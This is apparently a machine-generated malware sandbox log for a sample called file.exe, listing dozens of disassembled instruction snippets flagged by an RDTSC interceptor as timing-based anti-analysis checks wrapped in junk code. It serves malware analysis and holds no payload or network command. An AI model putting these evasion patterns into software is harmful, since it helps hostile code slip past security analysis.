                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E095FF second address: E09621 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F1228D24AC9h 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09621 second address: E09635 instructions: 0x00000000 rdtsc 0x00000002 js 00007F122870CBC6h 0x00000008 jne 00007F122870CBC6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E097D6 second address: E097E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F1228D24AB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E097E5 second address: E097FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBCDh 0x00000009 popad 0x0000000a jg 00007F122870CBCCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09C6A second address: E09C6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E09DDD second address: E09DFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD9h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FC29 second address: E0FC2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FC2F second address: E0FC33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FC33 second address: E0FC41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FC41 second address: E0FC45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0FC45 second address: E0FC61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jl 00007F1228D24ABEh 0x0000000f pushad 0x00000010 popad 0x00000011 jns 00007F1228D24AB6h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F703 second address: E0F70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F70C second address: E0F72C instructions: 0x00000000 rdtsc 0x00000002 jg 00007F1228D24AB6h 0x00000008 jmp 00007F1228D24AC6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F8C1 second address: E0F8CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F122870CBC8h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F8CE second address: E0F8F9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F1228D24AB6h 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F1228D24AC1h 0x00000012 pop eax 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 je 00007F1228D24AB8h 0x0000001d rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F8F9 second address: E0F903 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F122870CBCCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E0F903 second address: E0F90C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2140D second address: E21415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E21415 second address: E21437 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1228D24AB6h 0x00000008 jne 00007F1228D24AB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007F1228D24ABEh 0x0000001a push edi 0x0000001b pop edi 0x0000001c jng 00007F1228D24AB6h 0x00000022 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1BAF8 second address: E1BB1D instructions: 0x00000000 rdtsc 0x00000002 js 00007F122870CBDCh 0x00000008 jne 00007F122870CBC6h 0x0000000e jmp 00007F122870CBD0h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2EDED second address: E2EDF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2EDF2 second address: E2EE04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCDh 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2EE04 second address: E2EE26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1228D24AC9h 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2EE26 second address: E2EE30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F122870CBC6h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4A235 second address: E4A23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E494A7 second address: E494B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F122870CBCBh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E49F50 second address: E49F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E49F54 second address: E49F64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007F122870CBC6h 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4CF13 second address: E4CF3E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC4h 0x00000007 jns 00007F1228D24AB8h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 jbe 00007F1228D24AB6h 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4CF3E second address: E4CF69 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F122870CBD6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push edi 0x0000000f pop edi 0x00000010 popad 0x00000011 pushad 0x00000012 jno 00007F122870CBC6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4F8EE second address: E4F8F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4FAE3 second address: E4FB17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F122870CBD4h 0x00000008 jmp 00007F122870CBD4h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4FB17 second address: E4FB1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4FB1C second address: E4FB26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F122870CBC6h 0x0000000a rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4FB26 second address: E4FBBA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F1228D24AB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d or edx, 7ADCEC44h 0x00000013 push 00000004h 0x00000015 clc 0x00000016 mov dword ptr [ebp+122D1CC3h], edx 0x0000001c call 00007F1228D24AB9h 0x00000021 pushad 0x00000022 jmp 00007F1228D24AC7h 0x00000027 jmp 00007F1228D24AC3h 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f jnp 00007F1228D24AC2h 0x00000035 jmp 00007F1228D24ABCh 0x0000003a pushad 0x0000003b jbe 00007F1228D24AB6h 0x00000041 jl 00007F1228D24AB6h 0x00000047 popad 0x00000048 popad 0x00000049 mov eax, dword ptr [esp+04h] 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007F1228D24AC2h 0x00000055 jne 00007F1228D24AB6h 0x0000005b popad 0x0000005c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4FBBA second address: E4FBCD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F122870CBC8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [eax] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55200CF second address: 55200D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55200D3 second address: 55200D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500DA2 second address: 5500DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 xchg eax, ebp 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500DAE second address: 5500DBF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500DBF second address: 5500DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1228D24ABCh 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500DCF second address: 5500DE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007F122870CBCAh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500DE6 second address: 5500E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ah, B0h 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F1228D24AC4h 0x00000011 push ecx 0x00000012 pop edi 0x00000013 popad 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500E09 second address: 5500E1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 push edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500E1B second address: 5500E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55500C2 second address: 5550107 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F122870CBD6h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007F122870CBCCh 0x00000011 mov dword ptr [esp], ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F122870CBD7h 0x0000001b rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5550107 second address: 555011F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1228D24AC4h 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E007C second address: 54E00B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F122870CBD0h 0x0000000a or ah, 00000058h 0x0000000d jmp 00007F122870CBCBh 0x00000012 popfd 0x00000013 popad 0x00000014 mov ebx, eax 0x00000016 popad 0x00000017 xchg eax, ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F122870CBD1h 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E00B8 second address: 54E00F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F1228D24ABAh 0x00000013 adc ax, 1A18h 0x00000018 jmp 00007F1228D24ABBh 0x0000001d popfd 0x0000001e mov ebx, eax 0x00000020 popad 0x00000021 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E00F0 second address: 54E0132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F122870CBCBh 0x00000008 pushfd 0x00000009 jmp 00007F122870CBD8h 0x0000000e xor cl, FFFFFFA8h 0x00000011 jmp 00007F122870CBCBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e mov ecx, 4077A231h 0x00000023 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0132 second address: 54E014E instructions: 0x00000000 rdtsc 0x00000002 mov esi, 52F3306Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1228D24ABAh 0x0000000e popad 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E014E second address: 54E016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E016B second address: 54E019B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop edx 0x00000010 mov di, si 0x00000013 popad 0x00000014 popad 0x00000015 push dword ptr [ebp+0Ch] 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F1228D24ABAh 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E019B second address: 54E01B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 mov ebx, 6B092BD4h 0x00000016 popad 0x00000017 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E01B8 second address: 54E01BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0215 second address: 54E0226 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 1BC15DDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0226 second address: 54E022C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550067F second address: 5500685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500685 second address: 550068B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550068B second address: 550068F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550068F second address: 55006A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a movzx esi, di 0x0000000d push eax 0x0000000e push edx 0x0000000f mov edi, 0CA0997Ch 0x00000014 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55006A3 second address: 55006B1 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55006B1 second address: 55006C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24ABFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55006C4 second address: 5500705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F122870CBCDh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F122870CBCEh 0x00000016 pop ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F122870CBD7h 0x0000001e rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55005B6 second address: 55005F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f pushfd 0x00000010 jmp 00007F1228D24AC6h 0x00000015 sub al, FFFFFFB8h 0x00000018 jmp 00007F1228D24ABBh 0x0000001d popfd 0x0000001e popad 0x0000001f rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55005F8 second address: 550063F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F122870CBCEh 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F122870CBD7h 0x00000018 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 550063F second address: 5500645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5500381 second address: 55003BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F122870CBCCh 0x00000011 add cl, FFFFFFE8h 0x00000014 jmp 00007F122870CBCBh 0x00000019 popfd 0x0000001a mov dh, cl 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55003BE second address: 55003D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510124 second address: 5510133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F122870CBCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5510133 second address: 551015F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1228D24AC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1228D24ABCh 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 551015F second address: 55101A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F122870CBD1h 0x00000008 pushfd 0x00000009 jmp 00007F122870CBD0h 0x0000000e adc ch, 00000038h 0x00000011 jmp 00007F122870CBCBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ax, bx 0x00000021 mov ax, dx 0x00000024 popad 0x00000025 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55101A1 second address: 55101A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55101A7 second address: 55101AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552037C second address: 5520382 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5520382 second address: 5520386 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5520386 second address: 552038A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552038A second address: 55203A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F122870CBCBh 0x00000010 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203A0 second address: 55203A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203A7 second address: 55203BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F122870CBCAh 0x00000011 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203BD second address: 55203C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203C3 second address: 55203C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203C7 second address: 55203CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 55203CB second address: 552040F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F122870CBD9h 0x0000000f mov eax, dword ptr [ebp+08h] 0x00000012 pushad 0x00000013 mov edi, ecx 0x00000015 mov si, FCAFh 0x00000019 popad 0x0000001a and dword ptr [eax], 00000000h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F122870CBD1h 0x00000024 rdtsc
